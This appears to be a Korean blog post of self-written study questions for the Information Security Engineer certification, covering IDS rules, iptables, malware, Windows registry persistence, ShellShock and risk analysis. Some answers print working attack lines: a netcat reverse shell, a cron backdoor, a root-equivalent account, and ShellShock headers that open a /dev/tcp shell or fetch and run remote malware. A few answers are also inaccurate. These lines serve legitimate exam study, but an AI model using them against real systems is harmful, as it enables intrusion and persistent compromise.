301. ( )는 클라우드 컴퓨팅의 핵심기술로 물리적인 IT자원을 동시에 다수의 논리적인 IT자원으로 사용할 수 있는 기술.
- 가상화
302. 클라우드 컴퓨팅의 서비스 모델 3가지?
- IaaS, PaaS, SaaS
303. 클라우드 컴퓨팅의 배치 모델 3가지?
- 퍼블릭, 프라이빗, 하이브리드
304. SaaS의 한 종류로 보안을 클라우드 형태로 제공하는 모델은?
- SecaaS
305. Snort Action 유형 8가지?
- alert, log, pass, activate, dynamic, drop, reject, sdrop
306. Snort Rule Body setting 中 Payload/범위 관련 Option 7가지
1) Content : text => content:"~~~", Binary => "|00 ff|"
2) uricontent : 요청 URI 정보를 검사할 문자열 지정
3) offset : content 패턴을 검사할 시작위치 ( 0부터 시작 )
4) depth : offset으로부터 몇 바이트 검사할지
5) distance : 이전 content 매치된 경우, 매치된 후 몇 바이트 떨어진 위치에서 다음 content 검색을 시작할지 결정
6) within : distance로부터 몇 바이트 검사할지
7) nocase : 대소문자 가리지 않음
307. 정규표현식을 뭐라고 하는가?
- Pcre( Perl compatible regular Expression )
308. Threshold 관련 옵션에는 무엇이 있는가?
- threshold type <limit(까지)|threshold(마다)|both(한번)>, track <by_src|by_dst>, count<c>, seconds<s>
309. 비정상적인 패킷들을 취약점 스캔에 이용하는 이유는?
- IDS/IPS/FW 우회 목적도 있고, 시스템 장애/오류를 유도한다.
310. 사설 IP 대역은?
A클래스 : 10.0.0.0~10.255.255.255
B클래스 : 172.16.0.0~172.31.255.255
C클래스 : 192.168.0.0~192.168.255.255
311. Land Attack을 감지하기 위한 snort 옵션은??
- sameip
312. 공격자들이 SYN_FIN 플래그 조합 비정상 TCP 패킷을 이용하는 이유는?
- 구형 IDS/IPS/FW가 제대로 탐지 못하는 경우가 있고 일부 시스템에서는 이러한 플래그 패킷에 대해 로그를 남기지 않는 특성이 있기 때문이다.
313. Snort룰에서 flags : SF flags: SF+의 차이는?
- 전자는 SYN, FIN 만 설정된 경우 후자는 SYN,FIN은 반드시 포함하고 다른 플래그도 설정될 수 있다.
314. ( ) 기능은 방화벽을 통과하는 모든 패킷에 대한 연결 상태를 추적하여 이 정보를 메모리에 기억하고 있다가 기존의 연결을 가장하여 접근할 경우 메모리에 저장된 상태 목록과 비교하여 적합하면 통과하고 그렇지 않으면 거부하는 기능
- 상태추적 ( Connection Tracking 또는 stateful Inspection )
315. Snort의 SF, SF+ 와 같은 의미의 iptables option은?
- --tcp-flag SYN,FIN SYN,FIN(SF+), --tcp-flags ALL SYN,FIN(SF)
316. iptables -L, -F, -P 각각의 의미는?
-L : 해당 체인 룰 리스트 확인
-F : 해당 체인 룰 삭제
-P : 기본정책을 지정
317. 방화벽에서 패킷을 보았을 때 SYN 패킷이 보이면 ( )상태가 되고, SYN+ACK 패킷이 보이면 그때부터 ( )상태가 된다.
- NEW, ESTABLISHED
318. TCP 패킷 中 상태추적 테이블에는 NEW 이면서 SYN 플래그를 설정하지 않은 패킷 차단 설정은?
- iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
319. TCP 80포트 요청에 대하여 동일한 24 비트 마스크 대역의 IP에 대해서 동시 연결 개수가 10개 초과 시 이를 차단하는 설정은?
- iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --conlimit-above 5 -j DROP
320. TCP 80포트 요청에 대하여 동일한 24 비트 마스크 대역의 IP에 대해서 동시 연결 개수가 10개 초과 시 이를 차단하는 설정은?
- iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --conlimit-above 10 --connlimit-mask 24 -j DROP
321. 비정상적인 TCP 플래그 조합(SYN_FIN 플래그 조합) 패킷 차단 룰 설정 법은?
- iptables -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j DROP
322. 웹 어플리케이션 보안에 특화된 보안장비?
- WAF
323. 인가되지 않은 무선 단말기의 접속을 자동으로 탐지 및 차단하고 보안에 취약한 무선 공유기를 탐지하는 솔루션?
- WIPS
324. 단말기가 내부 네트워크에 접속을 시도할 때 이를 제어하고 통제하는 기능을 제공하는 솔루션으로 네트워크 제어 및 통제 기능을 통해서 내부 네트워크가 바이러스나 웜 등의 보안 위험으로부터 안전한 단말기들로 이루어질 수 있도록 강제하는 역할을 수행하는 것은?
- NAC
325. 다양한 보안 기능을 하나의 장비로 통합하여 제공하는 보안 솔루션?
- UTM
326. 보안 기능이 통합된 보안 커널을 추가로 인식한 운영체제?
- Secure OS
327. 보안 기능을 갖춘 USB
- Security USB
328. 조직 내부의 중요 자료가 외부로 빠져나가는 것을 탐지하고 차단하는 솔루션?
- DLP
329. 보안장비의 로그와 이벤트 정보를 통합해서 관리하기 위한 목적으로 만들어진 시스템?
- ESM( Enterprise Security Management )
330. ( )이란 동종 또는 이기종의 여러 보안 솔루션/장비에서 발생하는 로그,보안 이베튼 패턴 간에 연관성을 분석하는 것으로 보안 위협을 보다 정확한 판단과 대응을 가능하게 하는 것이다.
- 상호 연관 분석
331. ESM 구성 요소
1) 관리 대상 보안장비에 설치되어 사전에 정의된 규칙에 따른 로그 및 이벤트 데이터를 수집하여 ESM 매니저로 전달하는 기능을 수행?
2) 1)을 통해 수집된 데이터를 저장 분석하여 그 결과를 ( 3) )로 전달하는 기능을 수행
- Agent, Manager, console
332.위협을 조기에 감지하고 발생한 위협을 감소 또는 제거하는 것을 목표로 만든 보안 시스템?
- TMS( Threat Management System )
333. ( )는 기업 네트워크에 접속하는 사용자 PC의 운영체제와 각종 어플리케이션에 대한 패치를 기업 보안 정책에 따라 자동으로 설치, 업그레이드함으로써 웜이나 바이러스 공격 등으로부터 기업의 IT 환경을 효과적으로 보호해 주는 솔루션이다.
- PMS
334. 보안 솔루션(장비) 취약점에 계정관리&접근 관리에는 무엇이 있는가?
- 계정관리 : Default id,pw 변경, 계정별 권한 설정, 계정 관리
접근관리 : 원격 관리 접근 통제, 보안 접속, 세션 타임 아웃 설정
335. 시스템 각 개인은 유일하게 식별되어야 한다는 정보 보호 원칙은?
- 책임 추적성
336. 시스템, 네트워크, 웹 어플리케이션 등의 알려진 취약점에 대한 점검을 수행하는 도구와 개발한 곳은?
- 네서스(nessus), 테너블
337. 웹서버에 대한 포괄적 점검을 수행하는 도구?
- 닉토(Nikto)
338. ( )이란 파일시스템의 상태 추적 및 허가받지 않은 변경 여부를 주기적으로 점검하여 의심스러운 변화가 감지되면 이를 검사하고 복구하는 과정을 말한다. + 이러한 점검을 하는 도구?
- 파일시스템 부결성 점검 + tripwire
339. ( )은 지속적으로 자신의 존재가 탐지되지 않도록 숨기면서 관리자 권한의 획득과 백도어 등의 기능을 수행하는 코드와 프로그램의 집합을 말한다.
- Rootkit
340. 커널이 메모리상에 사용하고 있는 모든 자원들에 대한 정보들을 파일 형식으로 보관하는 파일시스템?
- /Proc
341. 루트킷 탐지 프로그램의 탐지 원리는?
- ps 실행 결과와 /Proc 디렉터리에 있는 프로세스 정보를 비교하여 /proc 디렉터리에는 프로세스가 있지만 ps 실행 시 보이지 않는 프로세스를 히든 프로세스로 탐지한다.
342. rpm의 주요 옵션 3가지는?
- rpm -Uvh 패키지이름.rpm(설치), rpm -qf 파일절대경로(해당 파일이 어느 패키지에 있는지), rpm -V 패키지 이름(무결성 검사)
343. rpm 무결성 검사 항목 中 S, M, 5, T, U, G, D, L 은 각각 무엇을 뜻하는가?
- S: 파일 크기 변경, M: 파일 퍼미션 변경, 5: MD5 체크섬 변경, T: 파일 수정 시간 변경, U&G소유자&그룹 변경, D:장치 정보 변경, L: 심볼릭 링크 변경
344. 파일 속성을 확인하는 방법과 변경하는 방법 그리고 주요 속성 정보 2가지?
- lsattr [파일명], chattr +/- [속성] [파일명], i :immutable, a: 추가만 허용
345. ( ) : 클라이언트/공격자가 타켓 서버에 접속하여 타겟서버의 쉘을 획등하는 방식
( ) : 역으로 타켓 서버가 클라이언트/공격자로 접속해서 클라이언트가 타켓 서버의 쉘을 획득하는 방식
- 바인드쉘, 리버스쉘
346. NC를 이용해 리버스 쉘을 할 때 공격자와 타겟은 각각 어떤 명령어를 수행하는가?
- 공격자 : nc -lvp 80, 타겟 : nc 10.10.10.10 80 -e /bin/bash (10.10.10.10이 공격자 ip라고 가정)
347. useradd -o -u 0 -g 0 -d /root algisa는 무엇을 뜻하는가?
- algisa 계정을 root 권한과 같은 권한으로 만듬.
348. 30 2 * * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash
- 매일 오전 2시 30분 nc 10.10.10.10 80 -e /bin/bash를 실행 (root권한으로)
349. 소프트웨어나 하드웨어의 버그 또는 취약점을 이용하여 공격자가 의도한 동작이나 명령을 실행하도록 하는 코드 또는 그러한 행위?
+ 위의 행위에 성공하면 프로그램 실행 제어권을 획득하게 되고 공격자가 의도한 명령을 담고 있는 코드를 실행하는 데 이를 ( )라고 한다.
- Exploit, Shell code
350. ( )는 아무 기능도 수행하지 않는 명령어를 의미한다. 기계어 코드의 헥사 값이 ( )이다.
- NOP, 0x90
351. 공개적으로 알려진 소프트웨어의 보안취약점을 표준화한 식별자 목록으로 미국 비영리 회사인 ( )에서 시작하여 국가 취약성 DB를 만들어 협력체계를 구착한 것은?
- MITRE, CVE
352. 소프트웨어에서 공통적으로 발생하는 약점을 체계적으로 분류한 목록?
- CWE
353. 소프트웨어 개발자가 가장 범하기 쉽고 위험한 25가지 소프트웨어 취약점 목록?
- CWE/SANS TOP 25
354. TAR 명령어를 이용하여 압축 및 아카이브된 파일을 푸는 방법은?
- tar -zxvf
355. 시스템에서 동작하는 모든 프로세스들에 의해 오픈된 파일 정보를 보여주는 프로그램? + 옵션
- lsof + -p : PID기준, -u : User 기준, -i : 인터넷 주소 기반 소켓 파일
356. 취약한 PC 환경의 사용자가 홈페이지에 접속할 경우 자신의 의도와는 무관하게 악성코드가 다운로드 되어 설치되는 공격?
- DBD
357. 난독화를 하는 이유 2가지
- 가독성을 낮춰 분석을 어렵게 하기 위함, 탐지 우회
358. 인자로 받은 문자열이 자바스크립트 코드가 맞는지 검증한 후 이를 실행하는 함수로 악성 스크립트에 자주 등장하는 함수?
- eval()
359. 10진수, 16진수 난독화를 디코딩하는 각각의 함수는?
- 10진수 : string.fromCharCode() 16진수 : unescape()
360. 웹사이트 화면을 해커가 원하는 화면으로 바꾸고 해킹 성공을 알리는 공격으로 시각적으로 자신의 존개감을 알리고 정치적인 메시지나 자신의 실력을 과시하는 것??
- Deface
361. URI를 인코딩하는 & 디코딩하는 함수 ??
- encodeURIComponent()/decodeURIComponent()
362. 다음 악성코드는 무엇을 설명하는 것인가?
1)악성코드에서 지정한 외부 주소에 접속하여 추가 악성코드를 다운로드하여 실행시키는 악성코드
2)자신의 내부에 포함되어 있는 데이터를 이용하여 악성코드를 생성
3)자신의 데이터를 이용해 바로 새로운 프로세스를 생성하여 메모리에 상주시키는 형태
4)특정 포트를 열어두어 정상적인 인증 과정 없이 원격 접속을 통해 직접 조작하는 형태
5)정상적인 소프트웨어의 형태를 띠지만 악위적인 행위를 포함하고 있는 악성코드
6)상업용 광고 목적으로 만들어진 악성코드
7)사전 동의 없이 설치되어 컴퓨터 정보와 개인정보를 수집하는 악성코드
8)PC의 부팅영역인 MBR을 조작하는 프로그램을 칭하는 이름으로 ( )과 ( )으로 나뉜다.
- 다운로더, 드롭퍼, 인젝터, 백도어, 트로이목마, 애드웨어, 스파이웨어, Bootkit, MBR, UBR
363. 실행 파일의 크기를 줄이고 내부 코드와 리소스를 감추기 위해 압축 또는 암호화하는 기법?
- Packing
364. ( ) 파일은 windows 운영체제에서 사용하고 있는 실행 파일 포맷으로 실행파일이 적재되는 가상주소, import함수 목록, Import함수 목록, Export함수 목록, 데이터, 코드 등의 정보를 관리하기 위해 파일의 첫 부분에 여러 가지 구조체로 구성
- PE
365. PE Header 中 IMAGE_DOS_HEADER, MS-DOS Stub Program, IMAGE_NT_HEADERS 각각의 역할을?
IMAGE_DOS_HEADER => 윈도우 운영체제의 하위 호환성 자원, 실제 윈도우용 PE 헤더 위치를 가리킴
MS-DOS_Stub Program => DOS 운영체제에서 윈도우용 PE 파일을 실행했을 때 보여줄 오류 메세지
IMAGE_NT_HEADER => 실제 PE파일 실행에 필요한 핵심적인 기능
366. PE 파일 섹션 구조는?
.text => 실행코드 .data => R/W 전역변수&정적변수 .rdata => 상수형 변수&문자열 상수
.bss => 초기화 되지 않은 전역변수 .idata => 임폴트할 DLL&API(<->.edata)
.rsrc => 윈도우 애플리케이션 리소스 관련 데이터 .reloc => 재배치 정보
367. ( )은 레지스트리 정보를 저장하고 있는 물리적인 파일로 오프라인 상태인 비활성 시스템에서 레지스트리를 분석할 때 활용
- 하이브 파일
368. 레지스트리 구조에 대해 설명하시오.
Master Key : HKLM(시스템 전체에 적용되는 하드웨어와 응용 프로그램의 설정 데이터), HKU( 각 사용자별로 키 항목을 생성하여 환경설정/프로파일 정보 저장)
Drived key : HKCU(현재 로그인 중인 사용자의 환경설정/프로파일 정보 저장), HKCC(현재 사용중인 윈도우의 하드웨어 프로필 정보), HKCU(파일 확장자와 확장자에 대한 연결 프로그램 정보)
369. 다음 레지스트리를 설명하시오.
1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run
- 윈도우 시작 시 동작하는 시작 프로그램
2)HKEY_CURRENT_USER\Software\Microsoft\windows\currentVersion\Run
- 현재 사용자 로그인 시 동작하는 시작 프로그램
3)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\winlogon
- 윈도우 로그인 시 동작하는 시작 프로그램
4)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALGISA Agent
-> cmd: sc create "ALGISA Agent" binpath="c:\windows\System32\exp1orer.exe"
displayname = "ALGISA Agent Service" start= auto
obj = "NT AUTHORITY\LOCALService"
- 서비스 자동 실행에 악성코드 등록
5)HKEY_CLASSES_ROOT\Directory\shell\CommandPrompt\command
value : @="C:\\windows\\system32\\exp1orer.exe"
- 윈도우 탐색기 디렉터리 context menu에 악성코드 실행 메뉴 추가
6)HKEY_LOCAL_MACHINE\Software\Classes\batfile/comfile/exefile\open\Command
value : @="C:\\windows\\system32\\exp1orer.exe\"%1\" %*"
- 특정 확장자(bat,com,exe 등)실행 시 악성코드 자동 실행
7)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sharedAccess\Parameters\FirewallPolicy\StandardProfile
value : "EnableFirewall" = dword:00000000
- 윈도우 방화벽 우회 설정
8)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\list
value : "악성코드 경로" = "악성코드 경로:*:Enabled:ALGISA Agent"
- 윈도우 방화벽에 악성코드 예외 허용
9)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GlobalyOpenPorts\List
value : "4321:TCP"="4321:TCP:*:enabled:ALGISA_Agent"
- 윈도우 방화벽에 악성코드가 사용하는 특정 포트 오픈 예외 허용
10)HKEY_CURRENT_USER\Software\Microsoft\windows\currentVersion\Explorer\Advanced
value: "Hidden"=dword: 00000002 or 00000000
HKEY_CURRENT_USER\Software\Microsoft\windows\currentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
value : "CheckedValue" = dword:00000000
- 숨김 파일 및 폴더 표시& 변경할 수 없도록 설정
11)HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Explorer\Advanced
value:"ShowSuperHidden"=dword:00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
value: "UncheckedValue"=dword:00000000
- 보호된 운영체제 파일 숨기기 & 변경할 수 없도록 설정
370. APT에 대해 설명하시오.
- 특정 표적을 대상으로 취약점을 파악하고 다양한 공격 기법을 이용한 지속적인 공격활동으로 정보 탈취, 시스템 파괴 등의 손상을 입히는 "공격 프로세스/절차"를 의미
371. APT 침투 기법 3가지?
1) 스피어 피싱 : 특정인(조직)을 표적으로 신뢰할만한 발신인이 보낸 것처럼 위장한 이메일 발송
2) 워터링 홀 : 사회공학기법을 통해 공격 대상이 주로 방문하는 웹사이트에 대한 정보를 사전에 파악한 후 제로데이 취약점 등을 이용하여 해당 사이트에 악성코드를 심어두고 공격 대상이 해당 사이트에 접근하게 되면 악성코드에 감염되는 방식
3)USB 메모리 스틱
372. ( )은 공격자는 사이버상에서 표적에 대한 공격을 위해 일련의 공격 단계를 거치는데 이런 단계 중 어느 한 단계의 공격을 탐지/차단/대응해 목표 달성 이전에 선제적으로 무력화시키는 방어시스템
- 사이버 킬 체인
373. SSH 클라이언트가 SSH 서버에 접속하여 만든 연결을 다른 어플리케이션에서 이용하여 통신할 수 있는 기술?
- SSH 포트 포워딩
374. 로컬 포트 포워딩&리모트 포트 포워딩에 대해 설명하시오.
- SSH Client => SSH -L 4321:10.10.10.10:80 10.10.10.10 (로컬)
SSH Client(내부용 웹서버) => SSH -R 4321:10.10.10.10.80 10.10.10.20 (리모트)
375. NTFS 파일시스템 구조에 대해 설명하시오
MBR -> 부트 코드(부팅 가능한 파티션을 찾아 해당 파티션 VBR 호출), 파티션 테이블, 시그니처로 구성
VBR -> 윈도우 부팅을 위한 기계어 코드와 불륨 및 클러스트의 크기 MFT의 시작주소 등 설정 정보를 담고 있으며 파티션의 가장 마지막 섹터에 VBR 백업본을 가지고 있다.
MFT => 모든 파일과 디렉터리에 대한 정보를 담고 있는 테이블 MAC에서 C가 Create time
376. 디스크 파괴형 악성코드는 어떻게 동작하는가?
- MBR 영역의 모든 값을 특정 문자나 랜덤한 쓰레기 값으로 덮어 씌운다.
377. 환경변수의 함수 선언문 뒤에 임의의 명령어를 삽입할 경우 환경 변수에 설정된 함수 선언 시 함수 선언의 끝을 인지하지 못하고 삽입한 명령어까지 실행하는 취약점?
+ 취약점이 발생하는 부분은 ( )이다. ( )로 시작하는 함수 선언.
- ShellShock +bash가 제공하는 함수 선언 기능"() {"
378. User-Agent:() {:;}; /bin/bash > /dev/tcp/10.10.10.10/8081 0<&1에 대해 설명하시오.
- CGI를 통한 Bash 취약점 공격으로 () {을 통해 ShellShock 임을 알 수 있다. /dev/tcp는 특수한 장치파일로 TCP클라이언트 소켓을 생성하는 파일이며, /dev/tcp/목적지 IP/목적지 port를 통해 해당 목적지에 접속한다.
리다이렉션을 통해 공격자가 bash의 입출력을 모두 통제할 수 있고, 리버스 쉘에 성공할 수 있게 된다.
379. Accept-Encoding : (){:;}; /bin/bash -c "/usr/bin/wget -O /tmp/xyz http://10.10.10.10/malware; /bin/chmod 777 /tmp/xyz; /tmp/xyz; /bin/rm -rf /tmp/xyz"을 설명하시오.
- CGI를 이용한 Bash 취약점 공격으로 -c(명령어로 해석) 옵션을 통해 원격 다운로드를 통한 공격을 하고 있다.
380. Bash(ShellShock)취약점의 대응 방안은?
1)취약 Bash 사용시 최신 버전으로 업데이트
2)CGI 사용안할 시 중지 OR 삭제
3)snort에서 탐지 후 삭제 => content:"() {"; http_header;
381. ( )취약점은 통신 구간 암호화를 위해 많이 사용하는 OpenSSL 라이브러리의 하트비트 확장 모듈(요청 메시지 데이터 길이 검증 미약)의 버그로 인하여 발생한 취약점이다.
- heartBleed
382. 381의 대응 방법??
+alert tcp any any <> any [433, 465, 536, 636, 695, 898, 989, 990] (msg: "SSLv3 Malicious HeartBleed Request V2"; Content:"|18 03 00|"; depth:3; content:"|01|"; distance:2; within:1; content:!"|00|"; within:1; sid:1000300;) 해석하시오.
- 취약점이 존재하지 않는 OpenSSL 버전으로 업데이트
+처음 세 바이트는 type(heartbeat)과 version을 그리고 2바이트 떨어진 곳에서 |01|로 설정됐다면 heartbeat request가 된다. 그리고 바로오는 2byte가 payload length를 뜻하는데, 첫 번째 바이트가 |00|이 아니라면 최대 64kb 크기를 요청하는 것이므로 이를 탐지하는 설정이다.
383. 공격자가 MITM 공격을 통해 512 비트 RSA로 다운그레이드 시켜 정보를 유출 시킬 수 있는 취약점?
- FREAK
384. 임시 Diffie-Hellman 키교환을 사용하여 TLS연결을 512비트 수출버전 암호화로 다운그레이드 할 수 있는 취약점?
- LogJam 취약점
385. ( )취약점은 SSL/TLS 협상 시 버전 다운그레이드 공격을 통해 SSLv3.0을 사용하도록 강제한 후 MITM공격을 통해 암호화되어 송수신되는 쿠키정보나 데이터를 추출하는 공격
+SSLv2.0 취약점을 이용한 교차 프로토콜 공격?
- POODLE 취약점 +DROWN 취약점
386. ( )는 네트워크를 통해 컴퓨터 시스템 간 시간 동기화를 위해 사용하는 인터넷 프로토콜로 ( )를 서비스 포트로 사용한다.
- NTP, UDP, 123번 PORT
387. 날짜/시간 관련 유닉스/리눅스 명령어에는 무엇이 있는가?
- 타임 확인 => date, rdate -p [타임 서버], ntpdate -q [ntp server]
설정 -> date MMDDhhmmCCYY.ss, rdate -s "타임 서버", ntpdate "NTP 서버"
388. NTP monlist 명령어는?
- ntpdc -n -c monlist [ntp 서버 주소]
389. NTP를 이용한 DRDoS 대응 방법은?
1) 서버 버전 업그레이드
2) 업그레드가 힘든 경우 /etc/ntp.conf에서 disable monitor을 통해 monlist 기능 해제
3) 조치가 되었는지 monlist 쿼리
4) iptables -A OUTPUT -p udp --sport 123 -m length --length 100: -j DROP
390. 접근통제 기법/정책/모델에 대해 설명하시오.
- MAC, DAC, RBAC
391. 보안 모델에는 무엇이 있는가?
- 기밀성 : BLP, 무결성 : 비바, 클락-월슨, 만리장성모델
392. 정보보호 계획 수립 과정에서 정보보호에 대한 목표, 방향이 제시된 최상위 문서로 조직이 수행하는 모든 정보보호 활동의 근거가 되는 것은?
- 정보보호정책
393. 정보보호정책 구현요소에 대해 설명하시오.
- 표준 : 사용자들이 준수하도록 요구되어지는 강제 규정
지침 : 정보보호 활동에 필요하거나 도움이되는 세부사항에 대한 규정, 강제성 미약
절차 : 구체적으로 어떻게 해야 하는지
기준선 : 최소보호수준을 정의
394. ( )란 조직의 자산에 대한 위험을 감수할 수 있는 수준으로 유지하기 위하여 자산에 대한 위험을 분석하고 이러한 위험으로부터 자산을 보호하기 위한 비용대비 효과적인 보호대책을 마련하는 일련의 과정
- 위험관리
395. 위험관리의 일려의 과정은?
- 위험관리 전략 및 계획 수립, 위험 분석, 위험 평가, 정보보호 대채 선정, 정보보호 계획 수립
396. ( )이란 원하지 않는 사건이 발생하여 손실 또는 부정적인 영향을 미칠 가능성을 말한다. 이와 관련된 요소 4가지? + 요소 4가지 간단히 설명
- 위험, 자산(유형/무형의 조직이 보호해야 할 대상), 취약성(위협의 이용 대상), 위협(자산에 손실을 초래할 수 있는 원치 않는 사건의 잠재적 원인이나 행위자), 정보보호대책(자산 보호를 위한 기술적/관리적 대책)
397. 위험 구성요소들 간의 관계에 대해 설명하시오.
398. 위험분석 전략/방법 4가지 설명
- 베이스라인 접근법 : 보호의 기본 수준을 정하고, 체크리스트 형태로 제공
비정형 접근법 : 전문가의 지식과 경험에 따라 위험을 분석하는 방식
상세 위험 분석
복합 접근법
399. 상세 위험 분석/평가 방법에 대해 설명
1) 정성적 위험분석 : 델파이법(전문가 집단 구성), 순위결정법(위협을 상호 비교하여 우선순위 결정), 시나리오법(어떤 사건도 기대대로X, 추정), 퍼지행렬법(자산가치-화폐, 위험발생확률-변수))
2) 정량적 위험분석 : 과거자료 분석법, 수학공식 접근법(위협의 발생빈도를 식으로 계산), 확률 분포법(확률적 편차를 사용), 점수법(가중치를 두어 위협을 추정)
400. 정량적 위험분석 단계에 나오는 4가지 개념과 구하는 방법을 설명하시오.
1) 노출 계수(EF) : 자산에 끼칠 수 있는 손실 비율
2) 단일예상손실액(SLE) : 자산 가치 X 노출 계수
3) 연간 발생률(ARO) : 5년에 1번이라면 0.2
4) 연간 예상 손실액(ALE) : SLA X ARO
'정보보안기사' 카테고리의 다른 글
내가 낸 정보보안기사 문제 ( 401 ~ 466 ) (2) | 2019.08.22 |
---|---|
내가 낸 정보보안기사 문제 (201~300) (0) | 2019.08.05 |
내가 낸 정보보안기사 문제 (101~200) (0) | 2019.08.02 |
내가 낸 정보보안기사 문제 (1~100) (14) | 2019.07.15 |
정보보안기사 13회 실기 합격 수기 (5) | 2019.06.23 |